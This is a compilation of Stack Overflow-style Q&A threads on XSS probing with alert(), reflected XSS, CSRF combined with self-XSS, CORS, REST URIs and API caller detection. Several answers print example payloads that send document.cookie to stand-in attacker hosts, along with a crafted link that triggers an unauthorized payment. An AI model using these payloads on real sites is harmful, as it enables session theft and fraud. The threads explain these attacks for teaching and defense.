XSS, why is alert(XSS) used to find/demonstrate xss vulnerabilities? - xss

I was wondering why alert() is quite often used to demonstrate XSS vulnerabilities. If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server. Is it just that this is a quite visual way to demonstrate that the attack is possible (as it uses the same characters as the actual payload would have), or is there something more? I tried to look it up online but found nothing...

You're overthinking it. It's demonstrated with an alert because when the alert is shown, it means the attacker was able to insert JavaScript code into your page and that code was executed as if you had put it there yourself. So from the perspective of the client (visitor) this code is coming from you, and they don't know anything about the attacker, which is exactly what the attacker wants.

It's just like a "hello world" program, but from the XSS world. It's easy to check and minimalistic: it verifies that you can execute at least some JavaScript function (alert). While you're looking for an XSS, the payload itself is not as important as the question "can I actually inject some JavaScript here?"
Basically, it's a two-step approach:
1. Find a vulnerable parameter (using alert or any other simple function).
2. Now let's have some fun with it.
If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server.
Not always. Sometimes one-way communication is enough:
Just send data to your server; no response is required. This is very useful in the stored XSS case (when, let's say, you can put arbitrary JavaScript code into a comment visible to other users).
You can inject some HTML asking the user to open another website and do whatever you want (XSS + social engineering).
To summarise: alert is a simple function, sufficient to check whether you can inject JavaScript, like a "hello world" to check that your setup is working. If you're successful, it's time to make it more complicated.
Edit: in a real attack, people usually check more options, because the "alert" keyword is blocked by most security filters. It doesn't mean that the XSS is not there ;) But "alert" is a very convenient example for tutorials, so you'll see it everywhere.
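As a rough sketch of that progression (the attacker.example endpoint below is made up for illustration): the probe only proves that injected JavaScript runs, while a follow-up payload can silently send data one way to a server the attacker controls. When the literal word "alert" is filtered, testers often fall back to other simple functions such as confirm() or print().
// Step 1: the probe - only proves that injected JavaScript executes.
alert(1);
// Step 2: a one-way exfiltration payload - no response from the attacker's
// server is needed (hypothetical attacker.example collection endpoint).
new Image().src = 'https://attacker.example/collect?c=' + encodeURIComponent(document.cookie);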

I was wondering why alert() is quite often used to demonstrate XSS vulnerabilities.
Simply because the alert() method is the best option to show people that you are able to insert JS code into the page.
If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server.
Kinda. XSS just means that the attacker is able to inject malicious JS into the page.
Is it just that this is a quite visual way to demonstrate that the attack is possible (as it uses the same characters as the actual payload would have), or is there something more?
It's just the visual way.
However, JS can be sandboxed in iframes etc., so alert('XSS') is not the best method to show that you are able to inject malicious code.
The best way is to use some information from the page itself. For example
alert(`XSS attack on ${window.location.host}'s page: "${document.title}"`)
is a much better way to demonstrate it. It shows that you have access to window properties (redirect) and to the document (modify) as well.
On this page it would display:
XSS attack on stackoverflow.com's page: "XSS, why is alert(XSS) used to find/demonstrate xss vulnerabilities? - Stack Overflow"

Related

Can someone give me a real scenario for reflective xss?

I am researching XSS and trying to understand different types of XSS.
Most documents talk about what they are and try to explain with a simple example. I have understood stored XSS quite well.
What I don't understand is reflected XSS and how it's done in a real-world scenario. Most explanations just talk about injecting malicious code which gets embedded in the page a user visits by clicking a malicious link. But I don't understand how and why they would click such a link in the first place.
If any of you can share a real-world example of reflected XSS, it would really be helpful.
"Hi midhun lc,
I created the salary report you asked for, find it [here].
Regards,
Your assistant"
[here] is a link that points to https://payrollapplication/reportid=<script>$.post('https://payrollapplication/send_payment?amount=5000&to=assistant')</script> (Obviously this also exploits CSRF.)
Or [here] is a link that points to https://payrollapplication/reportid=<script>$.post('malicious.server/?receive=' + document.cookie)</script> to steal session and other cookies. (This also exploits weak cookie flags.)
Or it can just send any data from the payrollapplication that the victim can access.
And so on. How exactly the payload gets to the victim may vary of course. It can be in an internal doc, sent in an email, etc.
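To see why such a link works at all, here is a hedged sketch of the kind of handler that makes it possible (the Node/Express route and parameter name are hypothetical): the reportid value from the URL is echoed into the response without escaping, so whatever script the crafted link carries is reflected back and executed in the victim's authenticated session.
// Hypothetical vulnerable endpoint (Node/Express sketch).
const express = require('express');
const app = express();

app.get('/report', (req, res) => {
  // DANGEROUS: the query parameter goes straight into the markup, unescaped.
  res.send('<h1>Report ' + req.query.reportid + '</h1>');
});

app.listen(8080);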

Is there a way to detect from which source an API is being called?

Is there any method to identify from which source an API is called? Source refers to an iOS application, or a web application like a page or button click (Ajax calls etc.).
Although saving a flag like ?source=ios or ?source=webapp while calling the API can be done, I just wanted to know whether there is any better option to accomplish this.
I also feel this requirement is weird, because in general an app or a web application is used by any number of users, so it is difficult to monitor that many API calls.
Please give your valuable suggestions.
There is no perfect way to solve this. Designating a special flag won't solve your problem, because the consumer can put in whatever she wants and you cannot be sure if it is legit or not. The same holds true if you issue different API keys for different consumers - you never know if they decide to switch them up.
The only option that comes to my mind is to analyze the HTTP headers and see what you can deduce from them. As you probably know, a typical HTTP request header block looks something like this:
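GET /api/resource HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15
Accept: application/json
Referer: https://example.com/some-page
(The field values above are only illustrative; the exact set of headers varies per client and browser.)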
You can try and see how the requests from all sources differ in your case and decide if you can reliably differentiate between them. If you have the luxury of developing the client (i.e. this is not a public API), you can set your custom User-Agent strings for different sources.
But keep in mind that the Referer header is not mandatory and thus not very reliable, and the user agent can also be spoofed. So it is a solution that is better than nothing, but it's not 100% reliable.
Hope this helps, also here is a similar question. Good luck!

REST opaque links and frontend of app

In REST, URIs should be opaque to the client.
But when you build an interactive JavaScript-based web client for your application, you actually have two clients! One for interaction with the server and another one for users (the actual GUI). Of course you will want to have friendly URIs, good enough to answer the question "where am I now?".
It's easier when a server just responds with HTML, so people can just click on links and don't care about structure. The server provides URIs, the server receives URIs.
It's easier with a desktop client. The same stuff. Just a button "show the resource", and the user doesn't care what the URI is.
It's complicated with browser clients. There is the address bar. This leads to the fact that the low-level part of the web client relies on the URI structure of the server, which is not RESTful.
It seems like the space between frontend and backend of the application is too tight for REST.
Does it mean that REST is not a good choice for reactive interactive js-based browser clients?
I think you're a little confused...
First of all, your initial assumption is flawed. URI opacity doesn't mean URIs have to be cryptic. It only means that clients should not rely on URI semantics for interaction. Friendly URIs are not only allowed, they are encouraged for the exact same reason you talk about: it's easier for developers to know what's going on.
Roy Fielding made that clear in the REST mailing list years ago, but it seems like that's a myth that won't go away easily:
REST does not require that a URI be opaque. The only place where the word opaque occurs in my dissertation is where I complain about the opaqueness of cookies. In fact, RESTful applications are, at all times, encouraged to use human-meaningful, hierarchical identifiers in order to maximize the serendipitous use of the information beyond what is anticipated by the original application.
Second, you say it's easier when a server just responds with HTML, so people can just follow links and not care about structure. Well, that's exactly what REST is supposed to do. REST is merely a more formal and abstract definition of the architectural style of the web itself. Do some research on REST and HATEOAS.
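To make HATEOAS concrete, here is a minimal, hypothetical sketch of a response: the representation itself carries the links the client should follow next, so the client never has to know or construct the server's URI structure.
{
  "id": 42,
  "status": "open",
  "_links": {
    "self":   { "href": "/orders/42" },
    "cancel": { "href": "/orders/42/cancellation" },
    "items":  { "href": "/orders/42/items" }
  }
}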
Finally, to answer your question, whether REST is a good choice for you is not determined by client implementation details like that. You can have js-based clients, no problem, but the need to do that isn't reason enough to worry too much about getting REST right. REST is a good choice if you have projects with long term integration, maintainability and evolution goals. If you need something quick, that won't change a lot, or won't be integrated with a lot of different clients and services, don't worry too much about REST.

Using easyXDM (or any other client-side framework) for HTTP service availability tests (or response parsing in general) possible?

I can't see from the docs how it should work. Debugging with Firebug did not help either. Maybe I would have to sit for some hours to understand it better.
The basic problem is that I'd like to check the availability of various geo services (WFS, WMS). Due to the browser's cross-site (same-origin) restrictions, XMLHttpRequest did not work.
I guess the Socket interface is the proper one to use, since I am not able to implement some CORS scenarios because I have no influence on the external services.
Using the following code works fine and returns some requested data (Firefox popup for the downloaded XML response):
var socket = new easyXDM.Socket({
    remote: "http://path.to/provider/", // the path to the provider
    onReady: function(success) {
        alert(success); // will not be called
    },
    onMessage: function(message, origin) {
        alert(message + " (from " + origin + ")"); // will not be called
    }
});
However, I did not find a way (trying with the onReady and onMessage callbacks) to somehow get at an HTTP status that I can process to determine which kind of response I got, e.g. 200 or 404.
Maybe it's the complete wrong way to solve this?
Sadly, even my bounty did not help to get answers, so I took a quick look around to gather some more info on the issue myself...
First...
the general problem of XSS
Looking at XSS and some related issues/links, there is more discussion of the problems than of solutions (which is OK).
Looking at the related Firefox docs about the JavaScript same-origin policy, it becomes clear that our global slogan "Security over Freedom" (1) is also applied in this area.
(Personally I don't like this way of solving the problem and would have liked to see another way to solve these problems as described at the end of this answer.)
(1) nicely summed up by Benjamin Franklin's (a founder of the US) statement: "He who sacrifices freedom for security deserves neither."
the CORS solution (=> external server dependencies)
The only supported standard/robust way seems to be to use the CORS (Cross Origin Resource Sharing) functionality.
Basically that means the external server has to at least deliver some CORS-compliant info (the HTTP header Access-Control-Allow-Origin: *) to allow others (= the client browser) to request data/content/.... Which also means that if one does not have control over the external server, there will be no general, robust client-side/browser way to do this at all :-(.
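For illustration only (and assuming you did control such a server, which is exactly what this scenario rules out), a minimal Node sketch of what the external service would have to send:
// Hypothetical sketch: the *external* server must emit this header before the
// browser will let a page from another origin read the response.
const http = require('http');

http.createServer((req, res) => {
  res.setHeader('Access-Control-Allow-Origin', '*'); // or a specific allowed origin
  res.end('service response');
}).listen(8081);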
robust solution for server/client applications (if no external server control)
So if the external server does not support CORS, or it is not configured to be usable from our requester origin (protocol/domain/port combination), it seems best to do this kind of access on our own application's server side, where we do not have these restrictions, but of course other implications.
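A minimal sketch of what that could look like, assuming a Node/Express backend (Node 18+, so the global fetch is available); the /check-service route, the url parameter and the HEAD probe are made up for illustration:
// Hypothetical same-origin proxy: the browser asks *our* server, and our server
// performs the cross-origin availability check without same-origin restrictions.
const express = require('express');
const app = express();

app.get('/check-service', async (req, res) => {
  const target = req.query.url; // e.g. a WMS/WFS GetCapabilities URL; validate/whitelist in real code
  try {
    const upstream = await fetch(target, { method: 'HEAD' });
    res.json({ available: upstream.ok, status: upstream.status }); // e.g. 200 or 404
  } catch (err) {
    res.json({ available: false, error: String(err) });
  }
});

app.listen(3000);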
client-side solution I would have liked to see
Some introduction first to understand the client-side world I experience browsing the web as a standard user ...
I personally do not like to be tracked when browsing the web nor do I like to be slowed down with poor hardware or network resources nor do I want to get exposed to simply avoided data security issues when browsing the web. That's why I am using Firefox with various useful plugins like RequestPolicy, AdBlock Plus, Ghostery, Cookie Monster, Flashblock ... . This already shows a complexity, no average user usually could/would handle. But especially looking at RequestPolicy it shows how access to external resources can be handled on the client-side.
So if, e.g., Firefox (without these plugins) supported some functionality to show the user a dialog similar to RequestPolicy, which could state something like the following, we could loosen the same-origin policy:
[x] 'http://srcdomain.com' (this site)
[ ] all sites (select to block/allow for all sites)
would like to request some data from
[x] 'http://dstdomain.com'
[x] 'http://dst2domain.com'
in a generally considered UNSECURE way.
You can select one of the following options for how to proceed with
access to the selected destination sites from the selected source sites:
[x] block always (generally recommended)
[ ] block only for this session
[ ] allow always (but not to subreferences) [non-recursively]
[ ] allow only for this session (but not to subreferences) [non-recursively]
[ ] allow always (and all subreferences) [recursively]
[ ] allow only for this session (and all subreferences) [recursively]
Of course this should be formulated as clearly as possible for the average user (which I certainly did not do here) and may also be handled by a default in the settings, like the other existing technologies (cookie handling, JavaScript handling, ...) do it.
This way I could solve the problem I have without much hassle, because I could nicely handle the amount of user setup required for this in my situation.
answer regarding easyXDM
I guess, since they recommend CORS as well and depend on the browsers, this is the only robust way, although some workarounds may still exist depending on browsers/versions/plugins (like Flash) and so on.

Is there any reason to sanitize user input to prevent them from cross site scripting themself?

If I have fields that will only ever be displayed to the user that enters them, is there any reason to sanitize them against cross-site scripting?
Edit: So the consensus is clear that it should be sanitized. What I'm trying to understand is why. If the only user that can ever view the script they insert into the site is the user himself, then the only thing he can do is execute the script himself, which he could already do without my site being involved. What's the threat vector here?
Theoretically: no. If you are sure that only they will ever see this page, then let them script whatever they want.
The problem is that there are a lot of ways in which they can make other people view that page, ways you do not control. They might even open the page on a coworker's computer and have them look at it. It is undeniably an extra attack vector.
Example: a pastebin without persistent storage; you post, you get the result, that's it. A script can be inserted that inconspicuously adds a "donate" button linking to your PayPal account. Put it up on enough people's computers, hope someone donates, ...
I agree that this is not the most shocking and realistic of examples. However, once you have to defend a security-related decision with "that is possible but it does not sound too bad," you know you crossed a certain line.
Otherwise, I do not agree with answers like "never trust user input." That statement is meaningless without context. The point is how to define user input, which was the entire question. Trust how, semantically? Syntactically? To what level; just size? Proper HTML? A subset of Unicode characters? The answer depends on the situation. A bare webserver "does not trust user input", yet plenty of sites get hacked today, because the boundaries of "user input" depend on your perspective.
Bottom line: avoid allowing anybody any influence over your product unless it is clear to a sleepy, non-technical consumer what and who.
That rules out almost all JS and HTML from the get-go.
P.S.: In my opinion, the OP deserves credit for asking this question in the first place. "Do not trust your users" is not the golden rule of software development. It is a bad rule of thumb because it is too destructive; it detracts from the subtleties in defining the frontier of acceptable interaction between your product and the outside world. It sounds like the end of a brainstorm, while it should start one.
At its core, software development is about creating a clear interface to and from your application. Everything within that interface is Implementation, everything outside it is Security. Making a program do the things you want it to is so preoccupying one easily forgets about making it not do anything else.
Picture the application you are trying to build as a beautiful picture or photo. With software, you try to approximate that image. You use a spec as a sketch, so already here, the more sloppy your spec, the more blurry your sketch. The outline of your ideal application is razor thin, though! You try to recreate that image with code. Carefully you fill the outline of your sketch. At the core, this is easy. Use wide brushes: blurry sketch or not, this part clearly needs coloring. At the edges, it gets more subtle. This is when you realize your sketch is not perfect. If you go too far, your program starts doing things that you do not want it to, and some of those could be very bad.
When you see a blurry line, you can do two things: look closer at your ideal image and try to refine your sketch, or just stop coloring. If you do the latter, chances are you will not go too far. But you will also make only a rough approximation of your ideal program, at best. And you could still accidentally cross the line anyway! Simply because you are not sure where it is.
You have my blessing in looking closer at that blurry line and trying to redefine it. The closer you get to the edge, the more certain you are where it is, and the less likely you are to cross it.
Anyway, in my opinion, this question was not one of security, but one of design: what are the boundaries of your application, and how does your implementation reflect them?
If "never trust user input" is the answer, your sketch is blurry.
(and if you don't agree: what if OP works for "testxsshere.com"? boom! check-mate.)
(somebody should register testxsshere.com)
Just because you don't display a field to someone, doesn't mean that a potential Black Hat doesn't know that they're there. If you have a potential attack vector in your system, plug the hole. It's going to be really hard to explain to your employer why you didn't if it's ever exploited.
I don't believe this question has been answered entirely. The OP wants to see an actual XSS attack if the user can only attack himself. This is actually done by a combination of CSRF and XSS.
With CSRF you can make a user's browser send a request carrying your payload. So if a user can attack himself using XSS, you can make him attack himself (make his browser send a request containing your XSS).
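A hedged sketch of that combination (every URL and field name here is hypothetical): the attacker's page silently submits a form to the vulnerable site from the victim's browser, planting the XSS payload in a field that only the victim ever sees; the next time the victim views that field, the payload runs in their session.
<!-- Hypothetical attacker-controlled page (assumes the target form has no CSRF token). -->
<form id="f" action="https://vulnerable.example/profile/update" method="POST">
  <input type="hidden" name="display_name"
         value="&lt;script&gt;new Image().src='https://attacker.example/?c='+document.cookie&lt;/script&gt;">
</form>
<script>document.getElementById('f').submit();</script>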
A quote from The Web Application Hacker's Handbook:
COMMON MYTH:
“We’re not worried about that low-risk XSS bug. A user could exploit it only to attack himself.”
Even apparently low-risk vulnerabilities can, under the right circumstances, pave the way for a devastating attack. Taking a defense-in-depth approach to security entails removing every known vulnerability, however insignificant it may seem. The authors have even used XSS to place file browser dialogs or ActiveX controls into the page response, helping to break out of a kiosk-mode system bound to a target web application. Always assume that an attacker will be more imaginative than you in devising ways to exploit minor bugs!
Yes, always sanitize user input:
1. Never trust user input.
2. It does not take a lot of effort to do so.
The key point being 1.
If the script, or service, that the form submits the values to is available via the internet then anyone, anywhere, can write a script that will submit values to it. So: yes, sanitize all inputs received.
The most basic model of web-security is pretty simple:
Do not trust your users
It's also worth linking to my answer in another post: Steps to become web security savvy.
I can't believe I answered without referring to the title-question:
Is there any reason to sanitize user input to prevent them from cross site scripting themself?
You're not preventing the users from being cross-site scripted; you're protecting your site (or, more importantly, your client's site) from being the victim of cross-site scripting. If you don't close known security holes because you couldn't be bothered, it will become very hard to get repeat business. Or good word-of-mouth advertising and recommendations from previous clients.
Think of it less as protecting your client and, if it helps, more as protecting your business.